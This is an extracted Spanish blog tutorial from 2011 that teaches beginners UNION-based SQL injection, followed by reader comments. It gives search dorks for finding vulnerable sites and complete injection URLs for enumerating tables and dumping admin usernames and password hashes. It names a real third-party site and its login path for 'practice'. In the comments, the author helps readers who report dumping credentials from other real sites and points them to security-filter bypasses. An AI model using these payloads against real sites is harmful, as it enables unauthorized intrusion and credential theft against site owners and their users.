Tutorial de Inyección SQL Para Principiantes _ # Root-Net _ Seguridad, Software, Windows, e...

16
13/2/2014 Tutorial de Inyección SQL para principiantes | # Root-Net | Seguridad, Software, Windows, e Informatica.. http://root-network.blogspot.com/2011/07/tutorial-de-inyeccion-sql-para.html 1/16 Página principal Scams Desings (Photos hop) sábado, 23 de julio de 2011 Tutorial de Inyección SQL para principiantes Publicado por OverNet en sábado, julio 23, 2011 , Primero y antes que nada, debemos saber muy bien los conceptos de cada uno que tocaremos en e ste tema. SQL Injection - Tutorial by OverNET ¿Qué es SQL? Significa un Lenguaje de Consulta Estructurado (en ingles Structured Query Languaje). Como su no mbre lo indica es un lenguaje para tener acceso a una Base de Datos que nos permite realizar varias o peraciones en ella, como poder guardar información privada de un sitio web, contraseñas, nombres, y otras cosas. Sin embargo, muchos CMS Sistema de Gestión de Contenidos (en ingles Content Management Syste m) utilizan SQL para acceder a una Base de Datos (PhpMyAdmin) y guardar información. CMS (Sistema de Gestión de Contenidos) no es ningún tipo de programa literalmente, sin embargo, es programado para que los usuarios tengan la facilidad de crear su pagina web utilizando una base de d atos. Algunos CMS son muy populares como lo son; SMF, Wordpress, y Blogger entre otros. ¿Y qué significa SQLi? Son la abreviatura de SQL Injection. Aunque, SQLi es un bug bastante viejo, existen CMS o páginas we b con esta vulnerabilidad. Debido que es un post para principiantes y un poco largo, no iré muy a fondo sobre los conceptos, por e so mejor aquí la dejamos y vamos al tutorial. ¿Donde puedo encontrar paginas vulnerables a SQLi? En Google, sin embargo, existen Dorks (Palabras claves para poder encontrar CMS vulnerables con fac ilidad). De cualquier manera no es muy difícil encontrar sitios (Probablemente) vulnerables a SQLi. Search... Labels 2wire (3) Aplicaciones (11) bugs (8) correo (1) Defacing (12) diseño grafico (1) Epic Fail (1) facebook (2) Firefox (5) gmail (1) Hacking tools (9) hardware (1) hotmail (2) htaccess (1) Humor (1) Infografia (1) Internet (26) IP (5) Java (3) Java script (2) localhost (5) Mexico (3) Musica (1) Papers (1) Phishing (1) Photoshop (1) PHP (17) SCAM (3) Seguridad (9) Shell (2) Software (6) Temas (1) Tutoriales (7) Velocidad (1) Videos (1) Windows (9) Windows 7 (6) Windows live messenger (3) Wordpress (1) Pginas vistas en total 460,412 LOL

description

SQL

Transcript of Tutorial de Inyección SQL Para Principiantes _ # Root-Net _ Seguridad, Software, Windows, e...

Page 1: Tutorial de Inyección SQL Para Principiantes _ # Root-Net _ Seguridad, Software, Windows, e Informatica.

13/2/2014 Tutorial de Inyección SQL para principiantes | # Root-Net | Seguridad, Software, Windows, e Informatica..

http://root-network.blogspot.com/2011/07/tutorial-de-inyeccion-sql-para.html 1/16

Rss

Página principal Scams Desings (Photos

hop)

sábado, 23 de julio de 2011Tutorial de Inyección SQL para principiantesPublicado por OverNet en sábado, julio 23, 2011 ,

Primero y antes que nada, debemos saber muy bien los conceptos de cada uno que tocaremos en e

ste tema.

SQL Injection - Tutorial by OverNET

¿Qué es SQL?Significa un Lenguaje de Consulta Estructurado (en ingles Structured Query Languaje). Como su no

mbre lo indica es un lenguaje para tener acceso a una Base de Datos que nos permite realizar varias o

peraciones en ella, como poder guardar información privada de un sitio web, contraseñas, nombres, y

otras cosas.

Sin embargo, muchos CMS Sistema de Gestión de Contenidos (en ingles Content Management Syste

m) utilizan SQL para acceder a una Base de Datos (PhpMyAdmin) y guardar información.

CMS (Sistema de Gestión de Contenidos) no es ningún tipo de programa literalmente, sin embargo, es

programado para que los usuarios tengan la facilidad de crear su pagina web utilizando una base de d

atos.

Algunos CMS son muy populares como lo son; SMF, Wordpress, y Blogger entre otros.

¿Y qué significa SQLi?

Son la abreviatura de SQL Injection. Aunque, SQLi es un bug bastante viejo, existen CMS o páginas we

b con esta vulnerabilidad.

Debido que es un post para principiantes y un poco largo, no iré muy a fondo sobre los conceptos, por e

so mejor aquí la dejamos y vamos al tutorial.

¿Donde puedo encontrar paginas vulnerables a SQLi?

En Google, sin embargo, existen Dorks (Palabras claves para poder encontrar CMS vulnerables con fac

ilidad). De cualquier manera no es muy difícil encontrar sitios (Probablemente) vulnerables a SQLi.

Search...

Labels

2wire (3)

Aplicaciones (11)

bugs (8)

correo (1)

Defacing (12)

diseño grafico (1)

Epic Fail (1)

facebook (2)

Firefox (5)

gmail (1)

Hacking tools (9)

hardware (1)

hotmail (2)

htaccess (1)

Humor (1)

Infografia (1)

Internet (26)

IP (5)

Java (3)

Java script (2)

localhost (5)

Mexico (3)

Musica (1)

Papers (1)

Phishing (1)

Photoshop (1)

PHP (17)

SCAM (3)

Seguridad (9)

Shell (2)

Software (6)

Temas (1)

Tutoriales (7)

Velocidad (1)

Videos (1)

Windows (9)

Windows 7 (6)

Windows live messenger (3)

Wordpress (1)

P�ginas vistas en total

460,412

LOL

Page 2: Tutorial de Inyección SQL Para Principiantes _ # Root-Net _ Seguridad, Software, Windows, e Informatica.

13/2/2014 Tutorial de Inyección SQL para principiantes | # Root-Net | Seguridad, Software, Windows, e Informatica..

http://root-network.blogspot.com/2011/07/tutorial-de-inyeccion-sql-para.html 2/16

Logotipo de Google

Solo es cuestión de ingeniarse las palabras claves para encontrar sitios Web con este bug.

¿No entendiste? La Inyección SQL se empieza por encontrar en una url muy parecido a esto: /index.ph

p?id=28, sin embargo, la inyección se comienza en la variable id=28.

Tutorial Inyección SQL para principiantesPrimera fase

Un ejemplo de como buscar en Google

1) Nos dirigimos a la pagina de Google y en el buscador colocamos esto id = cat index.php?

Nota: Actualmente Google ha actualizado su buscador, ha mejorado sus herramientas, y la interfaz g

rafica.

Sin embargo, obtendremos tal resultado como la imagen:

Google 2011-Junio: Buscador

2) También podemos utilizar la barra lateral Izquierda para encontrar más sitios vulnerables.

Barra lateral de Google Search 2011

¿Como saber si la página es vulnerable?

Bastante sencillo, tan solo colocar una ' (Comillas, coma, punto, cualquier caracter) al final de la variabl

e es decir /index.php?id=28' nos deberá marcar un error más o menos así (Puede variar los errores, p

ero el más común entre ellos es este):

You have an error in your SQL syntax; check the manual that corresponds to your MyS

QL server version for the right syntax to use near ''' at line 1

Post m�s Populares

Abrir puertos en móde

m 2Wire; 2701HG-T (T

elmex - México)Tutorial de Inyección S

QL para principiantesCalcular la raiz cuadra

da - Java en Netbeans

(Básico)[Tutorial] Crear cualqui

er SCAM (Fake login) e

n PHP con Dreamweav

er

Como compilar Java d

esde la consola de Wi

ndowsCambiar la dirección M

AC Address en Windo

ws 7Conectarse a WLM con

una cuenta GmailSimple PHP Obfuscato

rEvitar XSS/Html Injectio

n en formularios [PHP]

BásicoFreemake Video Down

loader - Descargar vid

eos HD de cualquier si

tioCantidad de lectores en linea

Shout Box

11 f eb 14, 09:56

Money ATM: Magic Formula to earn

online! http://adf.ly/bk7MX

9 f eb 14, 04:23

Jun: jom ke blog saya pulak, byk tips

utk lebih sihat

1 f eb 14, 10:16

Charles: Softw are autoblogw alking

30 ene 14, 01:43

Hai Blogger: [b]Hi, There very good

look and love you blog :) visit me too..

[/b]

28 ene 14, 12:58

Lily: Baru lancar !! formula buat duit

RM10 - RM100 sehari..

17 ene 14, 12:31

Oloroko: Actualizando..

[mensajes antiguos]

[Sw itchnode] actualizar

nombre

mensaje ok

ayuda · emoticonos · cbox

Canal de Youtube

Donde nos visitas

Page 3: Tutorial de Inyección SQL Para Principiantes _ # Root-Net _ Seguridad, Software, Windows, e Informatica.

13/2/2014 Tutorial de Inyección SQL para principiantes | # Root-Net | Seguridad, Software, Windows, e Informatica..

http://root-network.blogspot.com/2011/07/tutorial-de-inyeccion-sql-para.html 3/16

Sí de lo contrario no muestra error, quizás el sitio no sea vulnerable.. (Pero no significa que no sea vu

lnerable a SQLi).

¿Como? ¿Osea es vulnerable o no?

Déjame explicarlo, muchos administradores no tienen idea lo fácil que es arreglar este bug (SQLi) en s

u pagina web, lo que ellos hacen es unicamente agregar una función en PHP para evitar que se muest

ren los errores de la web es un error muy grave que cometen los webmaster, ni más ni menos, este e

s el sencillo código PHP que utilizan:

<?php error_reporting(0); ?>

Cabe mencionar que es un error muy común por parte de los administradores, ya que eso no arregla el

bug, sin embargo, el bug sigue allí.. Es un problema para la seguridad de su sitio, ya que el atacante p

odrá darse cuenta y seguir intentando hasta tener el usuario y contraseña de la administración fácilmen

te.

Explicación resumida:

Tenemos la siguiente página como ejemplo http://www.asfasd.com/index.php?cat=45

Agregamos una comilla al final de la url http://www.asfasd.com/index.php?cat=45'

Nos muestra el siguiente error You have an error in your SQL syntax; check the manual th

at corresponds to your MySQL server version for the right syntax to use near ''' at line 1

Explotando el BugSegunda fase

Viene la parte un poco más tediosa.

Pero antes de llegar a esta parte necesitamos entender dos conceptos:

UNION se usa para combinar el resultado de un número de comandos

SELECT en un conjunto de resultados.

Fuente | http://dev.mysql.com/doc/refman/5.0/es/union.html

Ahora ya habíamos visto que nos lanzo un error anteriormente y que si era vulnerable, ahora es tiempo

de buscar hasta encontrar la columna vulnerable.

Un ejemplo sencillo de como empezar la inyección tenemos lo siguiente /index.php?cat=45 ahora ant

es de la variable (45) y después del signo (=) agregaremos el signo de menos (-) deberá quedar así:

/articulo.php?articulo=-230 y agregamos el union y select y empezamos a partir del

numero 1 o el numero 0.

/articulo.php?articulo=-230+union+select+1-- (Muy importante poner los dos último

s guiones).

/articulo.php?articulo=-230+union+select+1,2,3-- (Es importante poner la coma entr

e cada numero)

Seguiremos así, hasta que no nos vuelva salir error como el anterior

¿Como sabre si el numero de la columna es vulnerable?

Al momento que veas uno o más números en la web y que no haya un error quiere decir que le hemos

dado a la columna vulnerable, un ejemplo real:

Información..

Avatar 2011

"..Cuanto más sabes, más te das cuenta

de que no sabes nada."

Sócrates

Creative Commons License

Live Traffic Feed

Real-time view · Menu

A visitor from Montevideo,Uruguay viewed Tutorial de

Inyección SQL paraprincipia... 1 min agoA visitor from Medellín,Antioquia viewed "Tutorial deInyección SQL paraprincipiantes | # Root-Net |

Seguridad, Software, Windows,e Informatica.." 8 mins agoA visitor from Mexico, DistritoFederal left "Calcular la raizcuadrada - Java en Netbeans

(Básico) | # Root-Net |Seguridad, Software, Windows,e Informatica.." via4.bp.blogspot.com 10 mins ago

A visitor from Mexico viewed"Tutorial de Inyección SQLpara principiantes | # Root-Net |

Seguridad, Software, Windows,e Informatica.." 10 mins agoA visitor from Mexico, DistritoFederal viewed "Calcular la raiz

cuadrada - Java en Netbeans(Básico) | # Root-Net |

Seguridad, Software, Windows,e Informatica.." 11 mins agoA visitor from Mexico, Distrito

Federal viewed "Cambiar la

Page 4: Tutorial de Inyección SQL Para Principiantes _ # Root-Net _ Seguridad, Software, Windows, e Informatica.

13/2/2014 Tutorial de Inyección SQL para principiantes | # Root-Net | Seguridad, Software, Windows, e Informatica..

http://root-network.blogspot.com/2011/07/tutorial-de-inyeccion-sql-para.html 4/16

Columnas vulnerables

Lo que esta marcado en recuadro esos números no son errores, y en la barra de direcciones esta la

semi-inyección.

En resumen los números marca que podemos concluir la inyección en este caso me iré sobre el nume

ro 2 (color azul).

Hay que tener en cuenta también, la versión de la base de datos si es 5.*.* - comunity se podrán sacar

los nombres de las tablas y columnas, si de lo contrario es inferior a la versión 5, es decir versión 4 no

se podrá extraer los nombres de las tablas y/o columnas, se tiene que hacer a ciegas y es un poco tedi

oso.

Para saber la versión de la base de datos (SQL) solo agregamos al final de union+select+1,2,3,4,5 dat

abase()

Tercera fase

Sacando nombre de las Tablas

Desde la barra de direcciones remplazamos el numero 2 por group_concat(table_name) debe quedar

algo así:

/articulo.php?articulo=-230+union+select+1,group_concat(table_name),3,4,5+from+

information_schema.tables--

También es importante agregar el +from+information_schema.tables-- al final, después ingresamos

esa url y nos da como resultado todos los nombres de las tablas que existen en la Base de dados.

Ejemplo real:

Nombre de las Tablas (Incompleta)

Nota | Como se ve en la imagen, tenemos como resultado los nombres de las tablas. Pero hay un peq

ueño problema, el tamaño de la página nos limita a que solo veamos una cierta cantidad de numero de

tablas (Por naturaleza).

Sin embargo, no hay nada que nos impida, pues gracias a una función de SQL podemos utilizar otra a

lternativa, en este caso será la opción limit que nos permitirá limitar el rango de registro, y así poder ac

ceder a la tabla del administrador o la de usuarios.

En este caso hay que hacer lo siguiente, quitamos group_concat() y solo dejamos table_name y al fina

l de information_schema.tables agregamos +limit+1,1-- así quedará la url:

/articulo.php?articulo=-230+union+select+1,table_name,3,4,5+from+information_sc

hema.tables+limit+1,1--

Lo cuál nos mostrará el nombre de la primer tabla, es decir, tendremos que buscar la tabla en donde s

e encuentra la del admin o la de usuarios

Nota | Puedes seguir utilizando la misma serie de 10 en 10 para que sea más rápido de encontrar la ta

Page 5: Tutorial de Inyección SQL Para Principiantes _ # Root-Net _ Seguridad, Software, Windows, e Informatica.

13/2/2014 Tutorial de Inyección SQL para principiantes | # Root-Net | Seguridad, Software, Windows, e Informatica..

http://root-network.blogspot.com/2011/07/tutorial-de-inyeccion-sql-para.html 5/16

bla de usuarios, ya que esta en orden alfabético de la a - z.

Un ejemplo sencillo:

/articulo.php?articulo=-230+union+select+1,table_name,3,4,5+from+information_sch

ema.tables+limit+10,1--

La tabla es KEY_COLUMN_USAGE (No es la que buscamos)

Seguimos aumentando de 10 en 10:

/articulo.php?articulo=-230+union+select+1,table_name,3,4,5+from+information_sch

ema.tables+limit+20,1--

La tabla es SESSION_VARIABLES (No es la que buscamos)

Seguimos intentado..

/articulo.php?articulo=-230+union+select+1,table_name,3,4,5+from+information_sch

ema.tables+limit+30,1--,1--

La tabla es cotizaciones (No es la que buscamos, pero estamos un poco cerca..)

Y así, hasta dar con el nombre de la tabla uno que diga: admin, administrador, usuarios, users, usuari

s, etc.. (Puede variar los nombres de las tablas y columnas por el idioma)

/articulo.php?articulo=-230+union+select+1,table_name,3,4,5+from+information_sch

ema.tables+limit+38,1--

La tabla es admin (¡¡ Bingo, es la que buscamos !!)

Una ves que tengamos el nombre de la tabla que queremos y es en este caso admin vamos a convertir

la en ASCII les dejo la herramienta online para el conversor de String a ASCII | http://easycalculation.co

m/ascii-hex.php

admin = 97 100 109 105 110

Como ven, la cadena admin esta en ASCII.

Extracción de columnas de la tablaCuarta fase

Ahora modificamos nuestra url algo que quede así (incluyendo admin, pero convertida en ASCII):

Nota | Lo marcado en negritas es lo que modifico la url anterior.

/articulo.php?articulo=-230+union+select+1,group_concat(column_name),3,4,5+fro

m+information_schema.columns+where+table_name=char(97,100,109,105,110)--

Como resultado nos tendrá que imprimir los nombres de las columnas, por ejemplo:

email, contrasena, usuario, pwd

Un ejemplo real es este:

Extracción de columnas

Otra alternativa pero utilizando la misma opción es utilizando el limit lo cuál solo nos imprimirá el rango

de la columna que le indiquemos.

Ejemplo:

Page 6: Tutorial de Inyección SQL Para Principiantes _ # Root-Net _ Seguridad, Software, Windows, e Informatica.

13/2/2014 Tutorial de Inyección SQL para principiantes | # Root-Net | Seguridad, Software, Windows, e Informatica..

http://root-network.blogspot.com/2011/07/tutorial-de-inyeccion-sql-para.html 6/16

/articulo.php?articulo=-230+union+select+1,column_name,3,4,5+from+information_

schema.columns+where+table_name=char(97,100,109,105,110)+limit+0,1--

Extracción de usuario y contraseña Quinta fase

Esta parte es la más fácil, ya que lo anterior era lo complicado. Supongamos que ya sabemos los nom

bres de la tabla en este caso es admin y las columnas que nos interesan son usuario y pwd (contrase

ña), ahora hay que extraer los datos de esas dos columnas y para eso hacemos lo siguiente.:

Nota | Recuerda que lo remarcado en negritas es lo que cambia la url anterior.

/articulo.php?articulo=-230+union+select+1,group_concat(usuario,0x3a,pwd),3,4,5+

from+admin--

Con esa simple inyección nos mostrará el usuario y contraseña de la administración.

SQL Injection

: = 0x3a (Hexadecimal)

usuario = Columna

pwd = Columna

admin = Tabla

La contraseña esta encriptada en MD5 HashEs lo peor que viene en este caso al no poder ver la contraseña real cuando esta encriptada en MD5 Ha

sh.

Pero gracias a que existen herramientas y diccionarios para crackear MD5 las contraseñas se pueden

desencriptar.

Pero hay que tener muy en cuenta que no todos los Hash son MD5 puede variar el tipo de Hash por la s

eguridad del CMS, hay contraseñas encriptadas en SHA-1, MD4, Base64, etc.. Son muy diferentes al M

D5.

Pero les dejo una lista para que puedan diferenciar el tipo de Hash | http://www.insidepro.com/hashes.

php también una herramienta en PHP para crackear Hash MD5 Online, tienen que subirlo a un FTP.

Herramienta crack MD5 Hash online mult.

¿No encuentro el login o la administración de la página? Por suerte también existen herramientas para poder encontrar el path en la que se encuentre el login d

e la administración, acá les dejo uno codeado por neutralised | Admin Panel Finder PHP.

Pagina para practicarComo se pudieron dar cuenta, este tutorial me guié en una pagina vulnerable y esa pagina es esta:

http://www.ancvm.com/articulo.php?articulo=-230

Administración de la pagina, la administración de la web esta en este path

http://www.ancvm.com/admin/login.php

NOTA | Recuerden que esta pagina puede que por el tiempo no sea vulnerable a este tipo de Inyecci

ón, también no abusen de los datos del administrador ni anden jodiendo la web, este tutorial es de u

Page 7: Tutorial de Inyección SQL Para Principiantes _ # Root-Net _ Seguridad, Software, Windows, e Informatica.

13/2/2014 Tutorial de Inyección SQL para principiantes | # Root-Net | Seguridad, Software, Windows, e Informatica..

http://root-network.blogspot.com/2011/07/tutorial-de-inyeccion-sql-para.html 7/16

ack To

p

so educativo y el administrador de este blog no se hace responsable de lo que el usuario pudiera ha

cer con esta información.

Fin del TutorialEste tutorial fue creado por OverNET, si tienen dudas o sugerencias pueden escribirlas en este mis

mo post.

Etiquetas: bugs , Defacing , Internet , Seguridad , Tutoriales

71 COMENTARIOS:

Este comentario ha sido eliminado por un administrador del blog.

Anónimo at miércoles, agosto 03, 2011 10:25:00 p. m.

amigo que buen tuto, pero tengo un problemilla cuando estoy en la fase de agre

gar el union con el 1 2 3 etc, me sale el sieguiente error

Not Acceptable

An appropriate representation of the requested resource /detalleoracion.php cou

ld not be found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an Error

Document to handle the request.

que puedo hacer???

Anónimo at miércoles, agosto 03, 2011 10:26:00 p. m.

Es porque el administrador del sitio tiene habilitado el "mod_security" en la conf

iguración del php.ini..

Es por eso que te da Error 406..

Hay una forma de bypassear el filtro de seguridad, pero es un poco complicado.

Para más info leer | http://seguridadblanca.blogspot.com/2011/07/bypass-mods

ecurity-asp.html

OverNet at miércoles, agosto 03, 2011 10:40:00 p. m.

Gracias compradre, seguire en la lucha, mil gracias

Anónimo at jueves, agosto 04, 2011 7:10:00 p. m.

amigo, que pena molestarte tanto, pero aqui estoy de nuevo y me sale el siguie

nte error

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result res

ource in /home/shrikant/public_html/link_navi.php on line 11

sigo con el orden de inyeccion pero no cambia nada ni imprime la info de las ta

blas ni nada

e buscado info sobre este error y no sale nada que pueda ayudarme, si eres tan

amable y si no es mucha molestia y ayudarme

Anónimo at lunes, agosto 08, 2011 3:25:00 p. m.

He googleado y medio a la pagina de 'Safety Electronics for motocycles' si es as

+1 Recomendar esto en Google

Page 8: Tutorial de Inyección SQL Para Principiantes _ # Root-Net _ Seguridad, Software, Windows, e Informatica.

13/2/2014 Tutorial de Inyección SQL para principiantes | # Root-Net | Seguridad, Software, Windows, e Informatica..

http://root-network.blogspot.com/2011/07/tutorial-de-inyeccion-sql-para.html 8/16

í, yo si pude imprimir los nombres de las tablas..

A mí me imprime la info hasta el numero '11' es decir:

/index.php?cat_id=-1,2,3,4,5,6,7,8,9,10,11--

El numero vulnerable es el '1' lo puedes comprobar:

1+union+select+concat(database(),0x3a,version()),2,3,4,5,6,7,8,10,11--

Te deberá imprimir el nombre y la versión de la DB.. xD

Y allí deberás seguir hasta poder encontrar los nombres de las tablas hasta col

umnas..

Saludos, escribe cualquier duda q tengas

OverNet at lunes, agosto 08, 2011 4:12:00 p. m.

muy buen tuto en verdad me sorprendio, tengo una duda, podemos obtener o d

escargar toda una base cin este metodo? gracias

omega96 at jueves, agosto 25, 2011 11:40:00 p. m.

La verdad no conozco alguna forma de como poder descargar la Base de datos

*.sql si es a lo que te refieres.

Si te refieres poder imprimirlas existen herramientas que te permiten hacerlo, al

gunas estan en PHP cuando tenga tiempo las posteó.

Existen herramientas para novatos, que incluyen la función para visualizar y pod

er guardar la Base de datos, el SQLi Helper y Havij.

Saludos

OverNet at viernes, agosto 26, 2011 3:05:00 p. m.

Muy buen post!

Muchas gracias amigo por compartir tu sabiduria con los demas!

ras3Ath0r at domingo, agosto 28, 2011 6:14:00 a. m.

Amigo muy bueno el post y muy util , tengo un problema al llegar al paso de extr

accion de usuario y contraseña. pongo al final from+usuario-- (en mi caso en la

pagina en la que estoy es usuario) y me salta el siguiente error: Error: SELECT *

FROM noticia WHERE id = -55 union select 1,group_concat(usuario,0x3a,pwd),3

,4,5,6,7,8,9 from usuario-- LIMIT 1

Unknown column 'usuario' in 'field list'

alguna idea?

dario! at miércoles, agosto 31, 2011 9:08:00 p. m.

El error que muestra es este:

Unknown column 'usuario' in 'field list'

Quizás no acepte 'group_concat()' intenta unicamente usando concat() es decir:

-55+union+select+1,concat(usuario,0x3a,pwd),3,4,5,6,7,8,9+from+usuario--

si de lo contrario no funciona, intenta quitar el concat y hacer lo siguiente;

Columna usuario:

-55+union+select+1,usuario,3,4,5,6,7,8,9+from+usuario--

Columna pwd:

-55+union+select+1,pwd,3,4,5,6,7,8,9+from+usuario--

Si vuelve a salir el mismo error, quizas esten vacias las columnas o no existen.

OverNet at miércoles, agosto 31, 2011 9:48:00 p. m.

A mi al mirar los nombres de las columnas me aparece esto : Illegal mix of colla

tions for operation 'UNION'Que significa? Saludos!

Page 9: Tutorial de Inyección SQL Para Principiantes _ # Root-Net _ Seguridad, Software, Windows, e Informatica.

13/2/2014 Tutorial de Inyección SQL para principiantes | # Root-Net | Seguridad, Software, Windows, e Informatica..

http://root-network.blogspot.com/2011/07/tutorial-de-inyeccion-sql-para.html 9/16

|\/|3L0C070|\| at miércoles, septiembre 07, 2011 1:17:00 p. m.

Significa que hay errores de caracteres, puede que no este escrito bien el nomb

re de las tablas o columnas en ASCII..

También salé cuando no es vulnerable la web.

OverNet at jueves, septiembre 08, 2011 4:17:00 p. m.

MMM yo ago todo lo que sies pero cuando llego asta el numero 5 osea 1,2,3,4,5

-- no me sale nada me tira el mismo error de siempre a que se deve esto? s;

Anónimo at martes, diciembre 06, 2011 1:23:00 a. m.

Yo lo intente en la web page que pusiste y no me sale nada ni errores no se por

que sera

Anónimo at miércoles, diciembre 28, 2011 12:00:00 p. m.

Lo siento, pero supongo que han arreglado el sitio web.

De cualquier manera, quizas agregue más sitios vulnerables para que todos pu

edan practicar.

Saludos

OverNet at miércoles, diciembre 28, 2011 5:19:00 p. m.

puedo sacar el admin y la pass, me queda algo como Categoria admin:pass (o

bviamente no son esos los nombres reales del admin y la pass) pero cuando

meto en el login (el mismo que usan los usuarios, quizas es por eso) los datos

de admin y password me dice que no existe tal usuario. quiza hice algo mal (es

otra pagina la que "hackee" no la que vos proporcionaste). muchas gracias des

de ya

Anónimo at martes, enero 17, 2012 1:55:00 p. m.

encontre el login del admin, pero igual sigue dando erroneo, pese a haber hech

o todos los pasos bien e incluso obtengo como resultado Categoria samir:fjohn

son pero no se cual es el admin y cual la pw. (soy el mismo que comento arriba

)

Anónimo at martes, enero 17, 2012 2:08:00 p. m.

Depende como sea el login del admin, aveces confundimos el cpanel,la del ftp,

con la de la web. (Comprueba si existen más logins)

Si haz manejado comúnmente estas columnas (user,0x3a,pass) con la tabla us

uario o user es probable que el usuario sea samir y la contraseña sea fjohnson

, también debes revisar si existe una tabla con el nombre admin, administrador,

administrator, etc..

y columnas en esa tabla.

Nota*

Quizás la que encontraste no es la del administrador si no del usuario.

OverNet at martes, enero 17, 2012 3:37:00 p. m.

gracias, resulta que solo puedo obtener la password del admin (fjohnson) pero

no el nombre del admin (la cuenta). ahora estoy usando SQLi Helper 2.7 que fa

cilita toda la tarea (la automatiza). no se si lo conoces, pero hice en pocos segu

ndos lo que me tomo casi horas con este tutorial. te lo recomiendo :)

Anónimo at martes, enero 17, 2012 5:26:00 p. m.

La conozco, pero el tutorial tiene como propósito unicamente aprendizaje y educ

Page 10: Tutorial de Inyección SQL Para Principiantes _ # Root-Net _ Seguridad, Software, Windows, e Informatica.

13/2/2014 Tutorial de Inyección SQL para principiantes | # Root-Net | Seguridad, Software, Windows, e Informatica..

http://root-network.blogspot.com/2011/07/tutorial-de-inyeccion-sql-para.html 10/16

ativo.

Una herramienta automatizada para principiantes nunca te dirá el porque de las

cosas.

Saludos

OverNet at martes, enero 17, 2012 5:50:00 p. m.

si alguna vez lo usaste, sabrias decirme porque solo funciona 1 vez y luego deja

de funcionar, o funciona cuando quiere? :S

Anónimo at martes, enero 17, 2012 6:55:00 p. m.

No tengo idea, es posible que tenga errores anti-script kiddies

OverNet at martes, enero 17, 2012 6:58:00 p. m.

Hola, obtuve una contraseña asi 414caf51f461495d4a8c4561c8c1f0b4:Oa

y no la puedo desencriptar (no es MD5 me parece, fijate que tiene ":") no se com

o desencriptarla, me podrias ayudar?

Anónimo at miércoles, enero 18, 2012 11:50:00 a. m.

No tengo idea, de que tipo de hash es.

OverNet at miércoles, enero 18, 2012 1:37:00 p. m.

gracias eres un ejemplo de grandesa tio y a ese q prefiere el automatizado esta

muy equivocado porq si a 15 min lo que hace el helper y eso q llevo un tiempo u

sandolo bueno mil gracias hermano q dios te bendiga a seguir a asi suerteeee

Anónimo at viernes, enero 20, 2012 4:28:00 a. m.

Se agradece.

Saludos

OverNet at viernes, enero 20, 2012 12:11:00 p. m.

oye amigo solo con una duda que significa el "230" que se coloca antes del sig

no "-" este numero puede variar?

Melestu at lunes, enero 23, 2012 12:30:00 a. m.

@Malestu, el '230' es unicamente la variable de la noticia, es decir, puedes emp

ezar la inyección con cualquier numero no altera en la inyección.

OverNet at lunes, enero 23, 2012 2:01:00 p. m.

Una herramienta automatizada para principiantes nunca te dirá el porque de las

cosas.

mensajes claro at jueves, marzo 01, 2012 2:13:00 p. m.

Amigo que buen tuto !

enviar mensajes claro at viernes, marzo 16, 2012 11:55:00 a. m.

muy buenoo

Anónimo at viernes, abril 13, 2012 1:41:00 p. m.

lo que si me ayudaran miren vereis no tengo mucha idea de esto pero intente c

on una web y me da error 404 y dice php 2.2 y apache 5.2.6 nose si eso se podri

a inyectar o si es vulnearable al sql no lo se pregunto muchas gracias si me pu

Page 11: Tutorial de Inyección SQL Para Principiantes _ # Root-Net _ Seguridad, Software, Windows, e Informatica.

13/2/2014 Tutorial de Inyección SQL para principiantes | # Root-Net | Seguridad, Software, Windows, e Informatica..

http://root-network.blogspot.com/2011/07/tutorial-de-inyeccion-sql-para.html 11/16

dieran responder mi name es sarah gracias

Anónimo at viernes, abril 13, 2012 1:42:00 p. m.

El error 404 es un filtro de seguridad.

Y no es vulnerable.

OverNet at viernes, abril 13, 2012 2:06:00 p. m.

oye que sabes de varchar sqli??

Anónimo at domingo, julio 01, 2012 12:27:00 a. m.

Llego a ahi y no pasa nada mas , ayuda

http://www.ranchworldads.com/index.php?cat_id=-4+union+select+1--

Anónimo at miércoles, agosto 01, 2012 3:40:00 p. m.

yo lo logre acedi a la clave pero me sale esto

horaciod:administra,elena:rocio

y cuando lo pongo en administrador no entra se puede por medio de la url o hay

q todavia hacer algo mas y es correcto q me salga esos cuatro nombres

Anónimo at domingo, agosto 05, 2012 12:22:00 a. m.

a me olvidava cuando meto los terminos me sale esto

[Fallo en la conexion con la base de datos] ( 2005 : Unknown MySQL server host

'DB_HOST' (1) )

Anónimo at domingo, agosto 05, 2012 12:25:00 a. m.

Si ya encontraste las passwords y no están encriptadas, tendrías que buscar el

login o administración. En tu caso el error se debe que no tiene conexión con la

BD, intenta o busca otro login, aveces tienen diferentes logins, uno esta escondi

do.

Utiliza un Admin Panel Finder

OverNet at domingo, agosto 05, 2012 10:19:00 a. m.

ok gracias por la ayuda

Anónimo at martes, agosto 07, 2012 10:51:00 p. m.

Hacked

Anónimo at martes, septiembre 04, 2012 6:34:00 a. m.

Ok. Muy buen tutorial. Y va la pregunta del millón de euros que implementar par

a que no nos pase esto de ser vulnerable?

Anónimo at martes, octubre 16, 2012 10:15:00 a. m.

Buena pregunta este fin de semana voy hacer un tutorial de como reparar el bug

.

Y la única forma es arreglar el código desde el mismo archivo.

De cualquier manera te paso un link donde explica como arreglar, si no se entie

nde este fin voy hacer un tutorial.

Page 12: Tutorial de Inyección SQL Para Principiantes _ # Root-Net _ Seguridad, Software, Windows, e Informatica.

13/2/2014 Tutorial de Inyección SQL para principiantes | # Root-Net | Seguridad, Software, Windows, e Informatica..

http://root-network.blogspot.com/2011/07/tutorial-de-inyeccion-sql-para.html 12/16

http://www.ribosomatic.com/articulos/como-evitar-sql-injection-en-nuestra-cons

ultas-phpmysql/

OverNet at martes, octubre 16, 2012 10:37:00 a. m.

mi pregunta es.. se puede tambien inyectar a paginas que no son desarrollada

s en php..es decir se podrá en una ASP???

Anónimo at miércoles, octubre 24, 2012 7:24:00 p. m.

Con este metodo no se puede, ya que es para PHP y de los archivos .php es do

nde esta el bug explotable.

En ASP si se puede hacer inyección pero es un poco más dificil.

OverNet at miércoles, octubre 24, 2012 9:06:00 p. m.

oye amigo me estanque en el paso de string to ASCII, cuando la quiero convertir

a ASCII me da el codigo, pero cuando pongo el codigo asi: -230+union+select+

1,group_concat(column_name),3+from+information_schema.columns+where+t

able_name=char(85 83 69 82 95 80 82 73 86 73 76 69 71 69 83)--

se supone que debe mostrar las claves y usuarios pero me manda este error: Y

ou have an error in your SQL syntax; check the manual that corresponds to your

MySQL server version for the right syntax to use near '83 69 82 95 80 82 73 86 73

76 69 71 69 83)--' at line 1

que puedo hacer??

Anónimo at martes, octubre 30, 2012 10:00:00 p. m.

Estas bien solo quitale los espacios y pones coma.

Así:

-230+union+select+1,group_concat(column_name),3+from+information_schem

